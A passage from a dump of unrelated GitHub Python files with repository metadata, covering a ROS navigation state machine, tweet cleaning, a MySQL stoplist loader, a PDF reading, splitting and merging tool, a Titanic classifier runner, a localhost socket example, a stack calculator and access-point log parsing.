)\n\t\tdesired_yaw_ = rospy.get_param( \"des_yaw\" )\n\t\t\n\t\t#rospy.loginfo( f\"(move_base_nav ) new target is (x={desired_position_.x}, y={desired_position_.y}, yaw={desired_yaw_})\" )\n\t\n\treturn res\n\n\n\nservice_move_base_signal = \"/nav_stack_signal\"\n''' the node assumes that some other node implements this client, used\n\tfor sending the signal when the robot reaches the objective. \n'''\n\ncl_move_base_signal = None\n''' (service client handle) client for :any:`service_move_base_signal`\n'''\n\ndef send_signal( ):\n\t''' send a signal through the service :any:`service_move_base_signal`\n\t\tif available. \n\t'''\n\tglobal cl_move_base_signal\n\tglobal service_move_base_signal\n\t\n\tif cl_move_base_signal == None:\n\t\t#rospy.loginfo( f\"(move_base_nav ) TRYING client {service_move_base_signal} ... 
\" )\n\t\trospy.sleep(rospy.Duration(1))\n\t\tcl_move_base_signal = rospy.ServiceProxy( service_move_base_signal, Empty )\n\t\tif cl_move_base_signal == None:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) unable to connect with {service_move_base_signal} -- retrying later...\" )\n\t\t\treturn\n\t\t\t\n\t\telse:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) FOUND SERVICE {service_move_base_signal}\" )\n\t\t\tpass\n\t\n\tif cl_move_base_signal != None:\n\t\ttry:\n\t\t\tcl_move_base_signal( )\n\t\texcept rospy.ServiceException:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) unable to connect with {service_move_base_signal} -- service call failed\" )\n\t\t\tcl_move_base_signal = None\n\n\n\nservice_head_orient_switch = \"/head_orient_switch\"\n''' service name for the head orientation\n'''\n\ncl_head_orient_switch = None\n''' (client handle) client to enable and disable the head orientation\n'''\n\n\n\n# current values\n\nposition_ = Point( )\n''' the current position of the robot, from the odometry\n'''\n\nyaw_ = 0.0\n''' the orientation of the robot about the 'z' axis, from the odometry\n''' \n\n# target\n\ndesired_position_ = Point( )\n''' the objective position for move_base. obtained from the parameters\n\t'des_pos_x' and 'des_pos_y'\n''' \ndesired_position_.x = 0.0\ndesired_position_.y = 0.0\ndesired_position_.z = 0.0\n\ndesired_yaw_ = 0.0\n''' the desired orientation of the robot\n'''\n\n# error evaluation\n\nerr_pos = math.inf\n''' the error between the desired position and the current one.\n\nNote:\n\tif the position is not measured, the distance will always be infinite. \n'''\n\nerr_yaw = math.pi/2.0\n''' the error between the current orientation and the desired one. \n\nNote:\n\tits default value is PI/2, which is also used when the distance is not measured\n'''\n\n# thresholds\n\nthreshold_position_ = 0.35\n''' the maximum allowed position error while reaching the target. 
\n'''\n\nyaw_precision_ = math.pi / 9 \n''' +/- 20 degree allowed\n'''\n\nyaw_precision_2_ = math.pi / 90\n''' +/- 2 degree allowed\n'''\n\n# odometry measurement\n\ntopic_odometry = \"/odom\"\n''' the node measures the position of the robot during the navigation.\n'''\n\nsub_odometry = None\n''' (subscription handle) subscription to the odometry\n'''\n\ndef normalize_angle( angle ):\n\t''' angle normalization between -PI and PI.\n\t\n\tNote:\n\t\tthe parameter \"angle\" is the err_yaw in this implementation.\n\t'''\n\tif(math.fabs(angle) > math.pi):\n\t\tangle = angle - (2 * math.pi * angle) / (math.fabs(angle))\n\treturn angle\n\n\ndef cbk_odometry( msg ):\n\t''' subscription callback for the odometry topic\n\t'''\n\tglobal active_\n\tglobal position_, yaw_\n\tglobal desired_position_, desired_yaw_\n\tglobal err_pos, err_yaw\n\t\n\tif active_:\n\t\t# position\n\t\tposition_ = msg.pose.pose.position\n\n\t\t# yaw\n\t\tquaternion = (\n\t\t\tmsg.pose.pose.orientation.x,\n\t\t\tmsg.pose.pose.orientation.y,\n\t\t\tmsg.pose.pose.orientation.z,\n\t\t\tmsg.pose.pose.orientation.w)\n\t\teuler = transformations.euler_from_quaternion(quaternion)\n\t\tyaw_ = euler[2]\n\t\t\n\t\t# estimation of errors\n\t\terr_pos = math.sqrt(pow(desired_position_.y - position_.y, 2) + pow(desired_position_.x - position_.x, 2))\n\t\terr_yaw = normalize_angle(desired_yaw_ - yaw_)\n\t\t\n\telse:\n\t\t# set defaults\n\t\terr_pos = math.inf\n\t\terr_yaw = math.pi / 2.0\n\n\n\ntopic_move_base_goal = \"/move_base/goal\"\n''' the topic for sending the target to the navigation stack\n'''\n\npub_move_base_goal = None\n''' (publisher handle) move base goal\n'''\n\ndef move_base_send_target( x, y ):\n\t''' send a target to move base. \n\t\n\tParameters:\n\t\tx (float) : \n\t\t\tthe x coordinate\n\t\ty (float) : \n\t\t\tthe y coordinate\n\t'''\n\tglobal topic_move_base_goal, pub_move_base_goal\n\t\n\tmsg = MoveBaseActionGoal( )\n\tmsg.header.frame_id = \"map\"\n\tmsg.goal.target_pose.header.frame_id = \"map\"\n\t\n\tmsg.goal.target_pose.pose.position.x = x\n\tmsg.goal.target_pose.pose.position.y = y\n\tmsg.goal.target_pose.pose.position.z = 0.0\n\tmsg.goal.target_pose.pose.orientation.x = 0.0\n\tmsg.goal.target_pose.pose.orientation.y = 0.0\n\tmsg.goal.target_pose.pose.orientation.z = 0.0\n\tmsg.goal.target_pose.pose.orientation.w = 1.0\n\t\n\tpub_move_base_goal.publish( msg )\n\trospy.sleep( rospy.Duration(1) )\n\n\n\ntopic_move_base_cancel = \"/move_base/cancel\"\n''' name of the topic for cancelling the navigation request\n'''\n\npub_move_base_cancel = None\n''' (publisher handle) the publisher for cancelling the request\n'''\n\ndef move_base_cancel_goal( ):\n\t''' send a cancellation request to move_base\n\t'''\n\tglobal topic_move_base_cancel, pub_move_base_cancel\n\t\n\tmsg = GoalID( )\n\t\n\tpub_move_base_cancel.publish( msg )\n\trospy.sleep( rospy.Duration(1) )\n\n\n\nstate_ = 0\n''' the current state of the node\n'''\n\ndef change_state( state ):\n\t''' state transition from the current one to the one in the argument.\n\t''' \n\tglobal state_ \n\tglobal cl_head_orient_switch\n\tglobal desired_position_\n\tglobal state_description\n\t\n\tstate_ = state\n\t\n\tif state_ == 0: # -- idle\n\t\tstate_description = \"idle -- waiting for a target\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( )\n\t\n\telif state_ == 1: # -- move_base planning\n\t\tstate_description = \"motion planning -- sending the request to move_base\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( 
)\n\t\tmove_base_send_target( desired_position_.x, desired_position_.y )\n\t\n\telif state_ == 2: # -- move_base motion\n\t\tstate_description = \"navigation -- going towards the target\"\n\t\tcl_head_orient_switch( False )\n\t\n\telif state_ == 3: # -- head_orientation behaviour\n\t\tstate_description = \"head orientation\"\n\t\tmove_base_cancel_goal( )\n\t\tcl_head_orient_switch( True )\n\t\n\telif state_ == 4: # -- send signal (end of the motion)\n\t\tstate_description = \"SUCCESS. sending signal\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( )\n\t\t\n\t\n\telse:\n\t\t#rospy.logwarn( f\"(move_base_nav ) WARNING: unknown state {state_}\" )\n\t\tchange_state( 0 )\n\n\n\nreplan_time = 30 # seconds\n''' the planner, in case the robot is requiring too much time for reaching\n\tthe point, can do a replanning request\n'''\n\nworking_rate = 10 # Hz\n''' the working rate is the maximum update frequency of this node. the status\n\tis checked with a frequency of 'working_rate' Hz.\n'''\n\nstate_description = \"\"\n''' just a message to make clear the current status of the node\n'''\n\ndef main( ):\n\t''' state machine implementation\n\t'''\n\tglobal active_, state_\n\tglobal err_pos, err_yaw\n\tglobal threshold_position_, yaw_precision_2_\n\tglobal replan_time, working_rate\n\tglobal state_description\n\t\n\t'''\n\twhile not rospy.is_shutdown():\n\t\tif active_:\n\t\t\trospy.loginfo( \"ON\" )\n\t\telse:\n\t\t\trospy.loginfo( \"OFF\" )\n\t'''\n\t\n\t'''\n\trospy.spin( )\n\t'''\n\t\n\tr = rospy.Rate( working_rate )\n\telapsed_time = 0.0\n\ttime_unit = rospy.Duration( 1/working_rate )\n\tprev_output = \"\"\n\twhile not rospy.is_shutdown( ):\n\t\t\n\t\t# wait (in any case)\n\t\tr.sleep( )\n\t\t\n\t\t# check active status\n\t\tif not active_:\n\t\t\tcontinue\n\t\t\n\t\t# update the goal\n\t\tdesired_position_.x = rospy.get_param( \"des_pos_x\" )\n\t\tdesired_position_.y = rospy.get_param( \"des_pos_y\" )\n\t\tdesired_yaw_ = rospy.get_param( \"des_yaw\" )\n\t\t\n\t\t# run the state machine\n\t\tif state_ == 0: # -- idle\n\t\t\tif err_pos > threshold_position_:\n\t\t\t\tchange_state( 1 )\n\t\t\telif err_yaw > yaw_precision_2_ :\n\t\t\t\tchange_state( 2 )\n\t\t\n\t\telif state_ == 1: # -- move_base planning\n\t\t\telapsed_time = 0.0\n\t\t\tchange_state( 2 )\n\t\t\n\t\telif state_ == 2: # -- move_base motion\n\t\t\telapsed_time = elapsed_time + time_unit.to_sec()\n\t\t\t\n\t\t\tif elapsed_time > replan_time:\n\t\t\t\t#rospy.loginfo( f\"(move_base_nav ) replanning move_base (timer expired, max {replan_time})\" )\n\t\t\t\tchange_state( 1 ) # -- replanning\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif err_pos < threshold_position_:\n\t\t\t\tif err_yaw > yaw_precision_2_:\n\t\t\t\t\tchange_state( 3 ) # -- orientation\n\t\t\t\telse:\n\t\t\t\t\tchange_state( 4 ) # -- end of the task\n\t\t\n\t\telif state_ == 3: # -- head_orientation behaviour\n\t\t\tif err_yaw <= yaw_precision_2_:\n\t\t\t\tchange_state( 4 )\n\t\t\n\t\telif state_ == 4: # -- send signal (end of the motion)\n\t\t\tsend_signal( )\n\t\t\tchange_state( 0 )\n\t\t\n\t\telse:\n\t\t\t#rospy.logwarn( f\"(move_base_nav ) WARNING: unknown state {state_}\" )\n\t\t\tchange_state( 0 )\n\t\t\n\t\t# output : current status\n\t\tif prev_output != state_description:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) current state = {state_} ({state_description})\" )\n\t\t\tprev_output = state_description\n\n\n\ndef on_shut( ):\n\trospy.loginfo( f\"(move_base_nav ) closing...\" )\n\n\n\nif __name__ == \"__main__\":\n\trospy.init_node( \"move_base_nav\" 
)\n\trospy.on_shutdown( on_shut )\n\t\n\t# rospy.loginfo( f\"(move_base_nav )\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) starting...\" )\n\trospy.sleep(rospy.Duration(2))\n\t\n\tif not rospy.has_param( \"des_pos_x\" ) or not rospy.has_param( \"des_pos_y\" ) or not rospy.has_param( \"des_yaw\" ):\n\t\t#rospy.logerr( \"(move_base_nav ) ERROR: parameters not found in the parameter server!\" )\n\t\t\n\t\trospy.signal_shutdown( \"required parameters missing\" )\n\t\trospy.sleep(rospy.Duration(1))\n\t\t\n\t\tos._exit( 1 )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) service {service_move_base_switch} ... \" )\n\tsrv_move_base_switch = rospy.Service( service_move_base_switch, SetBool, move_base_switch )\n\t#rospy.loginfo( f\"(move_base_nav ) service {service_move_base_switch} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) subscription: {topic_odometry} ... \" )\n\tsub_odometry = rospy.Subscriber( topic_odometry , Odometry, cbk_odometry )\n\trospy.sleep(rospy.Duration(1))\n\t#rospy.loginfo( f\"(move_base_nav ) subscription: {topic_odometry} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) client: {service_head_orient_switch} ... \" )\n\tcl_head_orient_switch = rospy.ServiceProxy( service_head_orient_switch, SetBool )\n\trospy.sleep(rospy.Duration(1))\n\t#rospy.loginfo( f\"(move_base_nav ) client: {service_head_orient_switch} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_goal} ... \" )\n\tpub_move_base_goal = rospy.Publisher( topic_move_base_goal, MoveBaseActionGoal, queue_size=10 )\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_goal} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_cancel} ... \" )\n\tpub_move_base_cancel = rospy.Publisher( topic_move_base_cancel, GoalID, queue_size=10 )\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_cancel} ... 
OK\" )\n\t\n\trospy.sleep(rospy.Duration(2))\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) ready\" )\n\tmain( )\n","repo_name":"programmatoroSeduto/ExperimentalRoboticsLab-Assignment-3","sub_path":"robocluedo_movement_controller/scripts/move_base_nav.py","file_name":"move_base_nav.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7561517725","text":"import pandas as pd\nimport numpy as np\nimport string\nimport re\n\nTRAIN_RATIO = .7\n\ndef clean_tweet_text(tweet):\n try:\n tweet = re.sub(r'\\\\\\'9[0-9]', '', tweet)\n tweet = tweet.translate(str.maketrans('', '', string.punctuation))\n words = tweet.split(' ')\n\n for index, word in enumerate(words):\n if 'https' in word:\n del words[index]\n\n return ' '.join(words)\n\n except:\n return None\n\ndef normalize_retweet(tweet):\n if tweet[0:3] == 'RT ':\n return tweet[3:]\n else:\n return tweet\n\nif __name__ == '__main__':\n data_raw = pd.read_csv(\"TrumpTweets.csv\")\n data_raw['text'] = data_raw['text'].apply(clean_tweet_text)\n \n data = data_raw[data_raw['text'] != '']\n data = data[data['text'].notnull()]\n data = data[(data['is_retweet'] == 'false') | (data['is_retweet'] == 'true')]\n data = data.sample(frac = 1)\n\n data = data.reset_index(drop=True)\n data.to_csv('trump_with_rts.csv')\n\n data['text'] = data['text'].apply(normalize_retweet)\n data.to_csv('trump_with_rts_normalized.csv')\n\n no_rts = data[data['is_retweet'] == 'false']\n no_rts.to_csv(\"trump_clean.csv\")\n","repo_name":"goobta/Presidental-Tweet-Analysis","sub_path":"analysis/trump_tweets/clean_trump.py","file_name":"clean_trump.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"46013980968","text":"#!/usr/local/bin/python\n# -*- encoding: utf-8 -*-\n\nimport MySQLdb # sudo pip install MySQL-python\nimport sys\nimport pprint\nimport math\nimport csv\n\n# オブジェクトの標準出力をインデント化\npp = pprint.PrettyPrinter(indent=2)\n \n# DBへログイン\nconnection = MySQLdb.connect(user=\"hatena\", host=\"localhost\", passwd=\"hatena\", db=\"hatena_bookmark\", charset='utf8')\ncursor = connection.cursor()\n\n# テーブル存在の確認\ncursor.execute(\"SHOW TABLES FROM hatena_bookmark like 'stoplist'\")\nif(cursor.fetchone() == None):\n cursor.execute(\"CREATE TABLE stoplist (id int(11) NOT NULL AUTO_INCREMENT, name varchar(128) NOT NULL, morpheme_id int(11), PRIMARY KEY (id))\")\n\n# 既存データの削除\nprint(\">> stoplistテーブルのデータをtruncate(削除)します.\")\ncursor.execute(\"TRUNCATE TABLE stoplist\");\n\n# _dic_stoplist.dat を morphemeテーブルに登録\n# _dic_stoplist.dat: [morpheme]\nprint(\">> ./data/stoplist.datの各形態素について,morpheme_idを取得します.\")\nstopmorpheme_morphemeId = []\nf = open(\"./data/stoplist.dat\", 'rU')\nreader = csv.reader(f, delimiter=' ')\nfor line in reader:\n stopmorpheme = line[0]\n cursor.execute(\n \"SELECT id FROM morpheme WHERE name = %s\", \n [stopmorpheme])\n res = cursor.fetchone()\n morpheme_id = -1\n if isinstance(res, tuple):\n morpheme_id = res[0]\n stopmorpheme_morphemeId += [[stopmorpheme, morpheme_id]]\nf.close()\n\nprint(\">> stoplistテーブルに登録します.\")\nfor line in stopmorpheme_morphemeId:\n if line[1] != -1:\n cursor.execute(\n \"INSERT INTO stoplist (id, name, morpheme_id) VALUES (null, %s, %s)\", \n [line[0], line[1]])\n else:\n cursor.execute(\n \"INSERT INTO stoplist (id, name, morpheme_id) VALUES (null, %s, null)\",\n [line[0]])\nconnection.commit()\n\n# 
DBから切断\ncursor.close()\nconnection.close()\n\nprint(\">> stoplistテーブルに登録が完了しました.\")\n","repo_name":"KenshoFujisaki/CreateHatenaBookmarkLogDB","sub_path":"scripts/set_stoplist_to_db.py","file_name":"set_stoplist_to_db.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3365499712","text":"from utilss import *\n\nimport datetime\n\ndevice = connect_device()\n\n# 生成时间戳\ntimestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\nclick_matchposition('image/ui/dailysource/dailysource_psychgramanalysis.PNG',device, timestamp)\ntimestamp2 = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\nclick_matchposition('image/ui/dailysource/dailysource_psy_level/dailysource_psy_level_666.PNG', device, timestamp2)","repo_name":"Lupich0322/OpencvScript","sub_path":"src/test/mainTest.py","file_name":"mainTest.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"48548523103","text":"import pyttsx3\nimport PyPDF2\nfrom PyPDF2 import *\nfrom tkinter import * \nfrom tkinter import filedialog\nimport os\ndef audiobook():\n speaker=pyttsx3.init()\n speaker.say(\"please ...select the PDF which i will read for u sir\")\n speaker.runAndWait() \n book=filedialog.askopenfilename()\n speaker.say(\"choose the page no. sir\")\n speaker.runAndWait()\n p=int(input(\"enter page no.\"))\n pdfReader=PyPDF2.PdfFileReader(book)\n pages=pdfReader.numPages\n speaker.setProperty('rate',130)\n voices=speaker.getProperty('voices')\n speaker.setProperty('voice',voices[0])\n page=pdfReader.getPage(p-1)\n text=page.extractText()\n speaker.say(text)\n speaker.runAndWait()\ndef pdfsplitter():\n speaker=pyttsx3.init()\n speaker.say(\"please ...select your file....sir..\")\n speaker.runAndWait()\n book=filedialog.askopenfilename()\n pdf_reader=PyPDF2.PdfFileReader(book)\n pdf_file=open('your new pdf.pdf','wb')\n speaker.say(\"please ...enter your page numbers sir....sir..\")\n speaker.runAndWait()\n print(\"enter ur page nos.\")\n l=list(map(int,input().split()))\n pdf_writer=PyPDF2.PdfFileWriter()\n for i in l:\n page=pdf_reader.getPage(i)\n pdf_writer.addPage(page) \n pdf_writer.write(pdf_file)\ndef pdfmerger():\n speaker=pyttsx3.init()\n speaker.say(\"please ...enter the number of PDFs.... u want to enter\")\n speaker.runAndWait()\n n=int(input(\"no.of pdf to merge\"))\n pdf=[]\n Pdfwriter=PyPDF2.PdfFileWriter()\n root=Tk()\n root.update()\n root.withdraw()\n speaker=pyttsx3.init()\n speaker.say(\"please ...select your files....sir..\")\n speaker.runAndWait()\n for i in range(n):\n pdf_to_merge=filedialog.askopenfilename()\n root.withdraw()\n root.update()\n pdf.append(pdf_to_merge) \n for j in pdf:\n pdfReader=PyPDF2.PdfFileReader(open(j,'rb'))\n for page in range(pdfReader.numPages):\n pageobj=pdfReader.getPage(page)\n Pdfwriter.addPage(pageobj)\n pdfoutput=open(\"new_file\"+'.pdf','wb')\n Pdfwriter.write(pdfoutput)\n pdfoutput.close()\n root.destroy()\n\nspeak=pyttsx3.init()\nspeak.say(\"Hello ..........sir....... i am your personal PDF manager ......... please say what can i do for u ....... \")\nspeak.say(\"choose the corresponding number for the action u want to do with your PDF.\")\nspeak.runAndWait()\nprint(\"1.Use Audiobook\\n2.Use PDF Splitter\\n3. 
Use PDF Merger\")\ncommand=int(input())\nif command==1:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening Audio..book..\")\n speake.runAndWait()\n audiobook()\nelif command==2:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening PDF.. splitter...\")\n speake.runAndWait()\n pdfsplitter()\nelif command==3:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening PDF.....Merger..\")\n speake.runAndWait()\n pdfmerger()\nelse:\n speake=pyttsx3.init()\n speak(\"please enter valid number\")\n speake.runAndWait()\n \n\n\n\n\n \n\n\n\n","repo_name":"souvenger/PDF_MANAGER","sub_path":"pdfmanager.py","file_name":"pdfmanager.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31120884830","text":"from matplotlib.pyplot import *\r\nimport numpy as np\r\n\r\n\r\ndef readHtm():\r\n dict={}\r\n infile = open('./city_temp/citylistWorld.htm', 'r')\r\n for i in range(1,261):\r\n infile.readline()\r\n for line in infile:\r\n if 'mso-list' in line:\r\n key= line.split('')[0].split('')[1].strip(' ( ')\r\n if 'href=\"ftp' in line:\r\n value= line.split('>')[1].strip('= minimo and len (texto) < maximo\n print(logitud)\n\ntexto = input(\"escribe un mensaje: \")\npalabra()\n","repo_name":"jamesalejandromelendez/ADSO-B","sub_path":"segundo trimestre/enero/punto3(operadores logicos)/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70667401004","text":"from decouple import config\nfrom nola_slackbots.bot import bot_creater\n\nTOKEN = config(\"OAUTH_ACCESS_TOKEN\")\nBOT_CHANNEL_ID = config(\"BOT_CHANNEL\")\nBOT_DISPLAY_NAME_ID = config(\"BOT_DISPLAY_NAME\")\nTOPIC = config(\"TOPIC\")\nTITLE_LINE_NUMBER = config(\"TITLE_LINE_NUMBER\", cast=int)\n\nrtm = bot_creater(\n token=TOKEN,\n bot_channel_id=BOT_CHANNEL_ID,\n bot_display_name_id=BOT_DISPLAY_NAME_ID,\n topic=TOPIC,\n title_line_number=TITLE_LINE_NUMBER,\n)\n\nif __name__ == \"__main__\":\n rtm.start()\n","repo_name":"dgnsrekt/nola-python-slackbot-project","sub_path":"run_bot.py","file_name":"run_bot.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20354202874","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 22 16:36:20 2021\n\n@author: cannon\n\"\"\"\nfrom datamanagement.analyze_data import load_titanic_data,save_prediction\nfrom datamanagement.split_data import split_data\nfrom datamanagement.data_clean import clean_data_pipelines,clean_data_manually\nfrom models.Model import Model\nfrom constants import data_constants as const\n\nmodelobj = Model()\n\n#model_name = const.BEST_MODEL_ID\nmodel_name = const.SVM_MODEL_MANUALLY\nis_svm= False\n\nif (not modelobj.load_model(model_name)):\n data=load_titanic_data()\n train_set, test_set = split_data(data)\n train_data,train_labels=train_set.drop(\"Survived\",axis=1),train_set[\"Survived\"]\n #train_data_cleaned=clean_data_pipelines(train_data)\n train_data_cleaned=clean_data_manually(train_data)\n print(\"datos limpiados\")\n modelobj.validacion_cruzada(train_data_cleaned, train_labels)\n modelobj.fine_tuning(train_data_cleaned,train_labels,is_svm)\n print(\"fine tuning done\")\n modelobj.validacion_cruzada(train_data_cleaned, train_labels)\n modelobj.train(train_data_cleaned,train_labels)\n 
print(\"modelo entrenado\")\n test_data,test_labels=test_set.drop(\"Survived\",axis=1),test_set[\"Survived\"]\n #test_data_cleaned=clean_data_pipelines(test_data)\n test_data_cleaned=clean_data_manually(test_data)\n prediction=modelobj.predict(test_data_cleaned)\n modelobj.print_estadisticas(test_labels, prediction)\n modelobj.save_model(model_name)\n#sacamos los resultados finales\nprint(\"Empeanzo la prediccion\")\nprediction_dataset = load_titanic_data(train_flag=False)\nfinal_data_prepared = clean_data_manually(prediction_dataset)\nfinal_prediction = modelobj.predict(final_data_prepared)\nprint(\"antes de salvar\")\nsave_prediction(final_prediction,prediction_dataset[\"PassengerId\"])\nprint(\"Finalizado\")\n\n","repo_name":"ercannon/titanic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30192963780","text":"# Updated: 04/04/20\n# With this file you can create a simple server/client connection]\n# This example runs a server on your local machine then run the client to establish\n# the communication among client server\nimport socket\n\nsock_ = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nsock_.connect((\"127.0.0.1\",9337))\nmsg = sock_.recv(1024) #How many bytes you want to receive\nsock_.close()\nprint(msg.decode(\"ascii\"))","repo_name":"jcprimo/python-training","sub_path":"penetration-test/TCP/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39060236913","text":"import sys\nsys.stdin = open('sample_forth.txt', 'r')\n\nN = int(input())\nfor i in range(1, N+1):\n num_list = list(input().split())\n stack = []\n oper = []\n for j in range(len(num_list)):\n if num_list[j].isdigit():\n stack.append(num_list[j])\n elif num_list[j] == '.':\n if len(stack) == 1 and len(oper) == 0:\n print('#{} {}'.format(i, stack[0]))\n else:\n print('#{} error'.format(i))\n else:\n oper.append(num_list[j])\n if len(stack) > 1:\n b = int(stack.pop())\n a = int(stack.pop())\n c = oper.pop(0)\n if c == '+':\n calc = a + b\n elif c == '-':\n calc = a - b\n elif c == '*':\n calc = a * b\n elif c == '/':\n calc = a / b\n stack.append(int(calc))\n else:\n print('#{} error'.format(i))\n break\n \n\n\n ","repo_name":"91hongppie/algorithm","sub_path":"stack2/forth.py","file_name":"forth.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16685933264","text":"from __future__ import division\nimport csv\nimport os.path\nimport collections\nimport tldextract\nimport itertools\nfrom urllib.parse import urlsplit\nfrom urllib.parse import urlparse\nfrom datetime import datetime\nimport json\nimport timeit\nfrom pylab import plot, ylim, xlim, show, xlabel, ylabel, grid\nfrom numpy import linspace, loadtxt, ones, convolve\nimport numpy as numpy\n\nPATH_MAP = '/home/moojokeubuntu/KU/4_2/RealProject/accesspoint/Data/'\nPATH_TO_LOG = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/accesslog/%s'\nPATH_TO_SAVE = '/home/moojokeubuntu/KU/4_2/RealProject/accesspoint/Log_per_build/LWAPP-3-REPLAY_ERR'\n\ndef raedfile():\n list_map_building = []\n compath = os.path.join(PATH_MAP, 'map_MAC.txt')\n with open(compath,'r') as f:\n for line in f :\n row_data = {}\n line_split = line.split(' ')\n print(len(line_split))\n AP_name = 
line_split[1]\n row_data['AP'] = AP_name\n row_data['ENG'] = line_split[0]\n list_map_building.append(row_data)\n\n readAP(list_map_building)\n\ndef readAP(list_map_building):\n list_AP = []\n list_ap_u = {}\n count = 0\n list_name = ['aplog-20180420'\n ,'aplog-20180421','aplog-20180422','aplog-20180423','aplog-20180424']\n for filename in list_name :\n with open (PATH_TO_LOG%(filename),'r') as file:\n for line in file:\n if 'count' in line :\n print(line)\n line_split = line.split(\" \")\n print(len(line_split))\n if len(line_split) == 28 :\n row_data = {}\n row_data['Month'] = line_split[0]\n row_data['Day'] = line_split[1]\n row_data['Time'] = line_split[2]\n row_data['Count'] = line_split[24]\n row_data['AP'] = line_split[27]\n print(row_data['Count'])\n print(row_data['AP'])\n list_AP.append(row_data)\n \n mac_to_ap(list_map_building,list_AP)\n\ndef mac_to_ap(list_map_building,list_AP):\n for i in range(len(list_AP)):\n for j in range(len(list_map_building)):\n if list_AP[i][\"AP\"] == list_map_building[j][\"AP\"]:\n list_AP[i][\"AP\"] = list_map_building[j][\"ENG\"]\n print(list_AP[i][\"AP\"])\n\n save_to(list_AP)\n \n\ndef save_to(list_AP):\n compath = os.path.join(PATH_TO_SAVE, '20to24.txt')\n with open(compath,'a') as f:\n for i in range(len(list_AP)):\n f.writelines(str(list_AP[i][\"Month\"])+\" \"\n +str(list_AP[i][\"Day\"])+\n \" \"+str(list_AP[i][\"Time\"])+\" \"+str(list_AP[i][\"AP\"])+\n \" \"+str(list_AP[i][\"Count\"])+'\\n')\n\n\n\n\ndef movingaverage(interval, window_size):\n\n window= numpy.ones(int(window_size))/float(window_size)\n return numpy.convolve(interval, window, 'same')\n\n\n \n \n \n # print(row_data['Month'])\n # #print(line_split)\n # print(len(line_split))\n # if len(line_split) not in list_ap_u.keys():\n # list_ap_u.update({len(line_split):line})\n # if len(line_split) == 28 :\n # count += 1\n # # with open (\"aa.txt\",'a') as f:\n # # for a in list_ap_u.keys():\n # # f.writelines(str(a)+\" \"+list_ap_u[a]+'\\n')\n # # print(list_ap_u)\n # print(count)\n\nif __name__ == '__main__':\n raedfile()\n #readAP() ","repo_name":"MooSithichai/Analysis_of_Unusual_Internet_Usage","sub_path":"AccessPoint/repreat_log.py","file_name":"repreat_log.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71427893162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport gzip\nimport zipfile\nimport tarfile\n\nimport numpy as np\nimport skimage\nfrom skimage import io, transform\nimport six\nfrom six.moves import urllib, range\nfrom six.moves import cPickle as pickle\n\n\ndef standardize(data_train, data_test):\n \"\"\"\n Standardize a dataset to have zero mean and unit standard deviation.\n\n :param data_train: 2-D Numpy array. Training data.\n :param data_test: 2-D Numpy array. 
